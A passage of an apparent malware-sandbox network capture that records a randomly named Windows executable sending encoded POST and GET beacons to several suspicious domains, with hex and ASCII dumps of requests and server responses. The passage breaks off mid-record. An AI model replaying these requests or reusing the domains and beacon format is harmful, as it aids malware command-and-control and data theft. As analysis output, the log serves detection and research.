Nov 12, 2024 07:56:37.682679892 CET	1773	OUT	POST /ezhm/ HTTP/1.1 Host: www.jigg.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.jigg.space Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.jigg.space/ezhm/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 51 53 4c 6d 69 47 54 42 61 4f 31 4c 47 57 79 57 2f 44 6f 49 7a 78 53 33 49 31 77 30 64 43 69 46 44 79 42 53 33 43 2f 6f 51 47 38 6e 4e 4d 65 54 31 62 5a 72 44 31 37 69 54 75 6a 49 58 66 74 73 6f 67 61 6b 79 4e 64 36 75 45 33 54 55 32 48 59 30 70 53 61 68 59 79 73 77 44 31 70 7a 6a 47 77 41 34 68 66 4e 6f 36 4d 30 50 56 41 61 6c 43 49 53 77 4e 41 33 71 68 52 4a 4f 46 6a 7a 4a 35 71 4c 36 46 4a 74 71 38 4b 2b 31 66 52 56 5a 70 64 2b 36 31 78 42 49 6d 4d 6b 50 32 35 47 4d 71 48 78 35 67 5a 54 4f 39 49 2b 71 71 5a 53 63 7a 7a 73 59 73 4b 55 50 64 61 51 79 50 50 61 55 75 67 63 57 6f 2b 45 30 52 4c 58 68 36 62 69 67 61 30 76 47 70 6f 57 5a 49 2b 6d 45 70 75 75 63 61 77 54 47 4a 66 64 37 50 36 73 77 77 57 73 77 62 64 6a 4f 7a 50 64 5a 56 34 69 50 6b 34 6f 69 61 39 4d 68 71 37 75 4a 70 2f 6e 6b 32 7a 79 77 44 79 57 69 52 67 46 64 54 69 71 66 59 4f 4d 6a 30 64 66 48 55 47 41 43 77 59 55 71 4d 59 74 30 69 4d 6c 44 73 50 2b 45 45 41 63 49 59 4c 79 58 72 7a 37 65 42 72 79 61 37 5a 74 78 33 52 [TRUNCATED] Data Ascii: m2gpQ=QSLmiGTBaO1LGWyW/DoIzxS3I1w0dCiFDyBS3C/oQG8nNMeT1bZrD17iTujIXftsogakyNd6uE3TU2HY0pSahYyswD1pzjGwA4hfNo6M0PVAalCISwNA3qhRJOFjzJ5qL6FJtq8K+1fRVZpd+61xBImMkP25GMqHx5gZTO9I+qqZSczzsYsKUPdaQyPPaUugcWo+E0RLXh6biga0vGpoWZI+mEpuucawTGJfd7P6swwWswbdjOzPdZV4iPk4oia9Mhq7uJp/nk2zywDyWiRgFdTiqfYOMj0dfHUGACwYUqMYt0iMlDsP+EEAcIYLyXrz7eBrya7Ztx3RekM2kBzGrV8j3yXsloJsQQjpXqokS6yAp6Ocymrc7AdMi3P0yXnb3BkJu87LdKXmFRuBCOexnNzc5TbT7tO8d+1d3Y496yfyzDVw1VMiBAvLsQ26C1PvR6Wfw0szrNAeuB1ctiChoNW32d6nZEurqWfsq5kNjqUa85RL7JL2PKZ/5FjPUt42nMgtX/SjFf9Wi8YG1p2xz0bktMyjnH9JoAmIbeJrmDBiqPmkSQjq6IJP8p+WVXwufmi8A9rifLOrXbsAkPMBuHb0xNUnm2XQvH2EVRdrpYkrcowm5Xv+DJOwDYnwDqIFoaaXXspDR6pCympc2dPu5mCp3TF2X//xrteVoddZzTn/AH7apWF4Y84ZeFL53c4kpqSZN2C+5XXQ/trnxgBrzicPYmdVyL+wZuHQVVEUHtYyPU6UBp4kDEhQ3E80U7ijJwjpa7ajfurgss9G/rqDm4latK6/6ccL1LLx7gTfU1ZvxthrcPySEYQktjb5t88z3zDHHjiG2aMQKXTaz/fnK+Lo615FI4U/CWBaUPysSOjAgiPEvatef5NXc/Ez//iDS/OhcGMxyPzPx3lh9m+p2S3eWPFvb4BJahbSNA1/U8vBtCJCEletwApxjoIR7trnSn5xTqLnrI3zfrrAxCu95wyTiaVO0xgzwTn18pK/eCuQVc [TRUNCATED]
Nov 12, 2024 07:56:38.274400949 CET	805	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Tue, 12 Nov 2024 06:56:38 GMT content-type: text/html transfer-encoding: chunked content-encoding: gzip connection: close Data Raw: 32 36 35 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8d 53 db 72 9b 30 10 7d ef 57 50 1e 32 ed 4c 6d 2e be 37 90 4e 4c e3 5b 9d 38 71 2e 18 5e 32 42 52 2c 51 21 51 10 60 a7 d3 7f 2f 86 4e 4c c7 7d a8 1e 90 76 d9 3d 67 f7 ac 64 bd ff ba 72 1e bc db 2b 85 c8 88 5d bc b3 0e 9b c2 00 df da 2a e6 ea c5 3b a5 5c 16 c1 00 d5 c7 ca 8c b0 04 0a 24 20 49 b1 b4 d5 c7 87 49 6b f8 27 f2 f8 9b 48 19 b7 f0 8f 8c e6 b6 ba 6b 65 a0 05 45 14 03 49 03 86 55 05 0a 2e 31 2f 73 e7 57 36 46 5b 7c 92 cd 41 84 6d 35 a7 b8 88 45 22 1b 09 05 45 92 d8 08 e7 14 e2 56 65 7c 52 28 a7 92 02 d6 4a 21 60 d8 36 da 7a 13 4e 52 c9 f0 85 a5 d5 7b d5 4e 55 24 17 29 4c 68 2c 8f 6d fd bb f6 04 bf 24 38 25 8d 12 f4 f3 2c 61 f6 a1 bf cf 9a 56 14 c5 40 6f 87 74 bb 6d a7 31 80 58 53 15 ed 08 69 69 a7 34 56 a5 5e 53 9e 53 8a de ff 51 58 da 71 30 56 20 d0 5e 11 9c 09 80 6c 15 89 e7 fa f8 e1 63 53 8c ba 65 45 ee e3 52 5d 89 77 52 0b 41 0e 6a 6f 23 ee a0 c4 4b c6 a1 a4 82 2b 0d 28 e5 e7 9b 7e 87 90 c3 2a 28 47 a2 68 4b 11 b7 99 80 e5 7c 05 6f 93 b2 21 c5 [TRUNCATED] Data Ascii: 265Sr0}WP2Lm.7NL[8q.^2BR,Q!Q`/NL}v=gdr+];\$ IIk'HkeEIU.1/sW6F[\|Am5E"EVe\|R(J!`6zNR{NU$)Lh,m$8%,aV@otm1XSii4V^SSQXq0V ^lcSeER]wRAjo#K+(~(GhK\|o!VDM+lc8ectFh~0C?$tE/\|N%6W6"`\|fbE92cg>&qoB3]fk8;g7MYQnff7S#]uFN2-\0_"Bg#=tD-lu\7$IVPh:fMeiniRtz00

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49998	96.126.123.244	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:56:40.224831104 CET	489	OUT	GET /ezhm/?m2gpQ=dQjGhxXMHv5+YwjryQcJrySkOGIlRyTTAmxJxQLZURFTEZTj1YJRXXyzUfzSUuBT8AWS6f5Uz3vbXV/G8YOf4Jqhl0le5SLuNKA+C9qBgvFZXkaOdih32u0uCf5d5IJ7EKd73Mp04V7U&KjH=KRIxdVHP60TD8 HTTP/1.1 Host: www.jigg.space Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 12, 2024 07:56:40.804989100 CET	1236	IN	HTTP/1.1 200 OK server: openresty/1.13.6.1 date: Tue, 12 Nov 2024 06:56:40 GMT content-type: text/html transfer-encoding: chunked connection: close Data Raw: 34 42 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 78 2d 75 61 2d 63 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6e 6f 73 63 72 69 70 74 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 37 30 2e 6a 69 67 67 2e 73 70 [TRUNCATED] Data Ascii: 4B9<!DOCTYPE html><html lang="en"> <head> <meta charset="UTF-8"> <meta http-equiv="x-ua-compatible" content="IE=edge"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title></title> <noscript> <meta http-equiv="refresh" content="0;url=http://www70.jigg.space/" /> </noscript> <meta http-equiv="refresh" content="5;url=http://www70.jigg.space/" /> </head> <body onload="do_onload()"> <script type="text/javascript"> function do_onload() { window.top.location.href = "http://www.jigg.space/ezhm?gp=1&js=1&uuid=1731394600.0005327985&other_args=eyJ1cmkiOiAiL2V6aG0iLCAiYXJncyI6ICJtMmdwUT1kUWpHaHhYTUh2NStZd2pyeVFjSnJ5U2tPR0lsUnlUVEFteEp4UUxaVVJGVEVaVGoxWUpSWFh5elVmelNVdUJUOEFXUzZmNVV6M3ZiWFYvRzhZT2Y0SnFobDBsZTVTTHVOS0ErQzlxQmd2RlpYa2FPZGloMzJ1MHVDZjVkNUlKN0VLZDczTXAwNFY3VSZLakg9S1JJeGRWSFA2MFREOCIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1s [TRUNCATED]
Nov 12, 2024 07:56:40.805010080 CET	141	IN	Data Raw: 59 57 64 6c 4c 32 46 77 62 6d 63 73 4b 69 38 71 4f 33 45 39 4d 43 34 34 4c 47 46 77 63 47 78 70 59 32 46 30 61 57 39 75 4c 33 4e 70 5a 32 35 6c 5a 43 31 6c 65 47 4e 6f 59 57 35 6e 5a 54 74 32 50 57 49 7a 4f 33 45 39 4d 43 34 33 49 6e 30 3d 22 3b Data Ascii: YWdlL2FwbmcsKi8qO3E9MC44LGFwcGxpY2F0aW9uL3NpZ25lZC1leGNoYW5nZTt2PWIzO3E9MC43In0="; } </script> </body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49999	3.33.130.190	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:56:45.864645958 CET	740	OUT	POST /tqc2/ HTTP/1.1 Host: www.dccf.earth Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.dccf.earth Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.dccf.earth/tqc2/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 4a 6d 4c 43 56 69 49 35 71 50 70 4d 71 43 78 50 53 78 69 79 41 65 32 4a 4c 78 64 6e 44 4d 79 32 39 64 65 76 76 6f 75 4b 6f 67 48 47 33 44 51 4c 49 46 69 58 2b 34 37 2b 52 2f 44 4f 52 59 33 58 70 71 2f 75 31 71 69 48 4b 78 2b 64 68 54 38 6b 34 34 6e 72 43 48 4c 49 64 43 39 44 49 70 65 33 68 4a 65 54 73 2f 4c 49 44 66 66 62 78 41 38 75 49 6b 64 5a 64 58 66 62 4b 6c 7a 47 56 57 69 69 48 44 56 7a 43 4e 6f 75 6e 79 65 69 75 52 4b 53 63 6e 76 77 50 47 52 31 6d 50 5a 45 69 6a 4e 6c 2b 76 38 4d 64 4e 51 73 6e 39 39 67 71 71 47 4f 5a 68 6b 78 54 39 4e 68 6c 65 47 6e 50 4b 47 56 75 4e 32 73 63 4e 44 57 4e 70 57 7a 45 71 33 47 4e 77 3d 3d Data Ascii: m2gpQ=JmLCViI5qPpMqCxPSxiyAe2JLxdnDMy29devvouKogHG3DQLIFiX+47+R/DORY3Xpq/u1qiHKx+dhT8k44nrCHLIdC9DIpe3hJeTs/LIDffbxA8uIkdZdXfbKlzGVWiiHDVzCNounyeiuRKScnvwPGR1mPZEijNl+v8MdNQsn99gqqGOZhkxT9NhleGnPKGVuN2scNDWNpWzEq3GNw==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	50000	3.33.130.190	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:56:48.415112019 CET	760	OUT	POST /tqc2/ HTTP/1.1 Host: www.dccf.earth Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.dccf.earth Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.dccf.earth/tqc2/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 4a 6d 4c 43 56 69 49 35 71 50 70 4d 34 79 42 50 55 57 32 79 49 65 32 47 48 52 64 6e 4a 73 79 79 39 64 61 76 76 70 72 58 6f 53 7a 47 75 6e 55 4c 61 77 43 58 35 34 37 2b 65 66 44 50 66 34 33 4a 70 71 44 4d 31 72 65 48 4b 78 71 64 68 53 4d 6b 34 4a 6e 6f 44 58 4c 4b 62 43 39 57 4c 5a 65 33 68 4a 65 54 73 2f 65 6a 44 63 76 62 79 77 73 75 61 52 39 61 55 33 66 55 50 6c 7a 47 44 6d 69 6d 48 44 55 51 43 49 78 31 6e 77 6d 69 75 51 36 53 64 31 48 78 42 47 52 33 72 76 59 76 71 43 30 64 36 64 74 30 61 65 5a 79 6d 75 78 6f 72 63 48 73 44 44 6f 64 4e 73 31 61 68 63 69 52 59 73 62 67 73 4d 79 30 52 76 33 33 53 65 7a 5a 4a 34 57 43 62 50 35 5a 7a 47 54 73 43 48 44 70 35 48 52 73 69 4d 58 6c 47 38 67 3d Data Ascii: m2gpQ=JmLCViI5qPpM4yBPUW2yIe2GHRdnJsyy9davvprXoSzGunULawCX547+efDPf43JpqDM1reHKxqdhSMk4JnoDXLKbC9WLZe3hJeTs/ejDcvbywsuaR9aU3fUPlzGDmimHDUQCIx1nwmiuQ6Sd1HxBGR3rvYvqC0d6dt0aeZymuxorcHsDDodNs1ahciRYsbgsMy0Rv33SezZJ4WCbP5ZzGTsCHDp5HRsiMXlG8g=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	50001	3.33.130.190	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:56:50.964245081 CET	1773	OUT	POST /tqc2/ HTTP/1.1 Host: www.dccf.earth Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.dccf.earth Cache-Control: max-age=0 Content-Length: 1250 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.dccf.earth/tqc2/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 4a 6d 4c 43 56 69 49 35 71 50 70 4d 34 79 42 50 55 57 32 79 49 65 32 47 48 52 64 6e 4a 73 79 79 39 64 61 76 76 70 72 58 6f 53 4c 47 79 45 4d 4c 4c 6d 4b 58 34 34 37 2b 58 2f 44 4b 66 34 32 4d 70 71 62 49 31 72 53 39 4b 31 61 64 67 77 45 6b 2b 39 4c 6f 4d 58 4c 4b 57 69 38 78 49 70 65 59 68 4b 33 37 73 2f 4f 6a 44 63 76 62 79 32 67 75 4b 55 64 61 59 58 66 62 4b 6c 7a 30 56 57 69 65 48 41 6b 75 43 49 38 41 6e 68 47 69 76 77 71 53 65 47 76 78 65 57 52 35 75 76 59 33 71 44 49 43 36 64 41 4e 61 64 45 58 6d 73 68 6f 72 5a 32 78 66 6e 31 4b 63 39 4a 2f 76 39 61 6f 50 4d 50 54 6d 4e 4b 2b 54 76 4c 4a 65 64 2f 47 47 59 36 44 55 5a 59 69 6e 57 47 5a 44 46 50 6e 79 51 64 69 35 4f 6e 56 5a 35 72 47 37 65 55 55 50 44 42 39 6b 4e 4c 6b 4d 41 5a 2b 4e 71 65 62 68 77 52 57 33 55 74 47 55 61 4c 52 77 5a 4b 38 6f 50 32 43 6e 78 58 68 53 78 5a 4a 4c 36 44 35 69 74 53 69 45 4d 30 33 61 30 6d 56 55 42 79 57 59 4e 37 35 74 6c 52 64 55 79 73 36 52 70 6c 41 56 67 48 6d 73 63 41 38 42 4b 51 42 43 32 75 43 [TRUNCATED] Data Ascii: m2gpQ=JmLCViI5qPpM4yBPUW2yIe2GHRdnJsyy9davvprXoSLGyEMLLmKX447+X/DKf42MpqbI1rS9K1adgwEk+9LoMXLKWi8xIpeYhK37s/OjDcvby2guKUdaYXfbKlz0VWieHAkuCI8AnhGivwqSeGvxeWR5uvY3qDIC6dANadEXmshorZ2xfn1Kc9J/v9aoPMPTmNK+TvLJed/GGY6DUZYinWGZDFPnyQdi5OnVZ5rG7eUUPDB9kNLkMAZ+NqebhwRW3UtGUaLRwZK8oP2CnxXhSxZJL6D5itSiEM03a0mVUByWYN75tlRdUys6RplAVgHmscA8BKQBC2uCYpdCjyVeOBJk3+/pcfxM8Cg0H+07jQYLzfSwbBqEOFmqypkeCTtzk3Ow70Egt05qoPNmYBFvI3lrC5yiXd+1/S0r+WFYzdws96VD+0LZw7aB4SslEsew6p6wN4ackBkH7G3R9uALpugIAg+RWtWbECsIKJ4BzKf+Vty3+hyb6gqCUIbjbNYPySFJWuBXCJ3Wlrk29kSoMTFymhBf/qy9jSv/XTdrOhgxyhU9piiqWYMSTM0zTRFTRRfkbY8S1tvVu1dpr29XgaJFxcewvjhjdsBvKsFxnrz35GDaoKc1HkUJcS39ohJSUTML9pjahD88y1jBBXCQZRzHve21PwXqg41uBmdOL0/Dzhxfb0+SyOALh/SLusLFAZHYuX6nwBe0F3szIMej3YuTQxBpw0VfCqThChqgL+F7agsRB4F6opSvRwExFywH0ga46mDcgTWTe2dumCIMMSgdH+07XYRTUpBqwgFNtqbTFQTdbsb0rSf+Vj9zpnKE4EMApXSfYvYUtvDhWTlJsx6HFIx1Wy6MdKQSxVJJbWrtPAiIgsPQVyIsNjEYOG2W/RrnqPRt0AeOUiLeqPPFWiROGM9B7SR53uH9VjBen3m1InkNFpsvmzT4yNKhOP0p1U6LPxQTH1jjZGmSAmciZhCViDkITkk0qXyHBGsCXGpR3c [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	50002	3.33.130.190	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:56:53.519300938 CET	489	OUT	GET /tqc2/?m2gpQ=EkjiWUwG3ohs+TM4TlGrX762MTxbJNqBztSStbX9jWSqgmIiHV+G9e22XLXvdY+CpYL3+KW1Lj2pkjsh45K8Km++cQEoOKGWr6yUp6/3Gdm0z29MECdpMSDGGxPrHF2ZKiEDH4kL+yTJ&KjH=KRIxdVHP60TD8 HTTP/1.1 Host: www.dccf.earth Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2
Nov 12, 2024 07:56:54.126183033 CET	419	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 12 Nov 2024 06:56:54 GMT Content-Type: text/html Content-Length: 279 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6d 32 67 70 51 3d 45 6b 6a 69 57 55 77 47 33 6f 68 73 2b 54 4d 34 54 6c 47 72 58 37 36 32 4d 54 78 62 4a 4e 71 42 7a 74 53 53 74 62 58 39 6a 57 53 71 67 6d 49 69 48 56 2b 47 39 65 32 32 58 4c 58 76 64 59 2b 43 70 59 4c 33 2b 4b 57 31 4c 6a 32 70 6b 6a 73 68 34 35 4b 38 4b 6d 2b 2b 63 51 45 6f 4f 4b 47 57 72 36 79 55 70 36 2f 33 47 64 6d 30 7a 32 39 4d 45 43 64 70 4d 53 44 47 47 78 50 72 48 46 32 5a 4b 69 45 44 48 34 6b 4c 2b 79 54 4a 26 4b 6a 48 3d 4b 52 49 78 64 56 48 50 36 30 54 44 38 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?m2gpQ=EkjiWUwG3ohs+TM4TlGrX762MTxbJNqBztSStbX9jWSqgmIiHV+G9e22XLXvdY+CpYL3+KW1Lj2pkjsh45K8Km++cQEoOKGWr6yUp6/3Gdm0z29MECdpMSDGGxPrHF2ZKiEDH4kL+yTJ&KjH=KRIxdVHP60TD8"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	50003	104.21.69.93	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:56:59.211436033 CET	758	OUT	POST /igdb/ HTTP/1.1 Host: www.gamebaitopzo.fun Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.gamebaitopzo.fun Cache-Control: max-age=0 Content-Length: 218 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.gamebaitopzo.fun/igdb/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 48 56 6c 5a 4a 74 5a 32 6a 69 72 6d 52 65 31 2b 35 77 74 66 41 4c 6a 67 52 43 71 6a 68 74 36 43 58 4d 66 52 70 65 78 76 32 50 6c 79 52 72 61 68 6a 39 41 73 74 79 46 76 58 66 79 46 39 4e 30 79 64 74 76 4f 44 43 58 46 69 58 6c 78 53 45 43 47 56 30 79 57 56 78 52 56 46 52 53 68 54 4d 43 6f 6c 6b 47 4a 6f 6c 33 47 38 48 31 6a 4b 6c 48 45 50 53 65 6a 78 31 2b 5a 6d 32 7a 30 52 76 7a 73 50 34 68 39 4a 7a 51 36 36 48 49 54 7a 49 45 4f 77 53 73 71 78 4b 43 30 41 64 39 5a 31 47 42 64 72 37 4f 72 46 5a 61 76 76 4f 77 56 46 55 4d 33 63 47 6f 49 62 37 6d 31 30 41 43 6d 31 56 6b 63 48 50 51 6a 76 35 69 6f 6d 57 74 53 71 6a 48 67 4d 51 3d 3d Data Ascii: m2gpQ=HVlZJtZ2jirmRe1+5wtfALjgRCqjht6CXMfRpexv2PlyRrahj9AstyFvXfyF9N0ydtvODCXFiXlxSECGV0yWVxRVFRShTMColkGJol3G8H1jKlHEPSejx1+Zm2z0RvzsP4h9JzQ66HITzIEOwSsqxKC0Ad9Z1GBdr7OrFZavvOwVFUM3cGoIb7m10ACm1VkcHPQjv5iomWtSqjHgMQ==
Nov 12, 2024 07:57:00.224172115 CET	905	IN	HTTP/1.1 404 Not Found Date: Tue, 12 Nov 2024 06:57:00 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1ukkx%2F9ugakJ%2FHR%2BTGnVHin7ZP5akkMd4Qt1Y4marDGnMgwOTFTAIeBI1dOfn9wyy%2FokbU2lk0gv%2B%2FCs97Wg%2FVqfHmG3Al0JDhorHiqOmDNS2H5MPjWqrH1U45QybRKW0jvpoGDlCA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e14a0155c7a2cbf-DFW Content-Encoding: gzip alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1920&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=758&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 f0 72 d9 24 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 19 86 76 36 fa 50 69 90 d9 45 76 30 c5 79 e9 99 79 15 c8 72 fa 30 d3 f4 a1 2e 01 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6d(HML),I310Q/Qp/Kr$T";Ctv6PiEv0yyr0.a30

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	50004	104.21.69.93	80	5364	C:\Program Files (x86)\AvIRXrIjyBiJINDyEvWOFLWUHNrRijtkIdwAJiFcUTQIhCJVWRztBlOQyww\fXkDwRWxFFQGfp.exe

Timestamp	Bytes transferred	Direction	Data
Nov 12, 2024 07:57:01.758691072 CET	778	OUT	POST /igdb/ HTTP/1.1 Host: www.gamebaitopzo.fun Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip, deflate Accept-Language: en-US,en Origin: http://www.gamebaitopzo.fun Cache-Control: max-age=0 Content-Length: 238 Content-Type: application/x-www-form-urlencoded Connection: close Referer: http://www.gamebaitopzo.fun/igdb/ User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:6.0a2) Gecko/20110613 Firefox/6.0a2 Data Raw: 6d 32 67 70 51 3d 48 56 6c 5a 4a 74 5a 32 6a 69 72 6d 4c 2b 46 2b 38 54 56 66 48 72 6a 6e 53 43 71 6a 34 64 36 47 58 4d 54 52 70 66 30 77 33 35 39 79 51 4f 2b 68 69 34 73 73 6f 79 46 76 64 2f 79 64 35 4e 30 70 64 74 6a 6f 44 48 33 46 69 58 78 78 53 46 79 47 56 46 7a 6b 57 42 51 7a 65 68 53 76 58 4d 43 6f 6c 6b 47 4a 6f 6c 6a 73 38 48 64 6a 4a 55 33 45 41 54 65 69 79 31 2b 65 78 47 7a 30 47 2f 7a 6f 50 34 67 6f 4a 33 51 63 36 45 77 54 7a 49 30 4f 78 44 73 31 37 4b 43 79 64 4e 38 79 7a 54 6c 56 6a 59 69 54 44 75 2b 51 69 35 6b 4d 41 69 4e 56 47 6b 6b 6b 46 71 65 4f 77 43 6d 51 69 7a 35 70 46 4f 55 37 69 62 57 4a 35 68 49 34 6e 78 6d 6b 61 73 51 6d 74 39 72 74 4e 54 42 67 50 38 45 39 73 48 5a 70 65 78 63 3d Data Ascii: 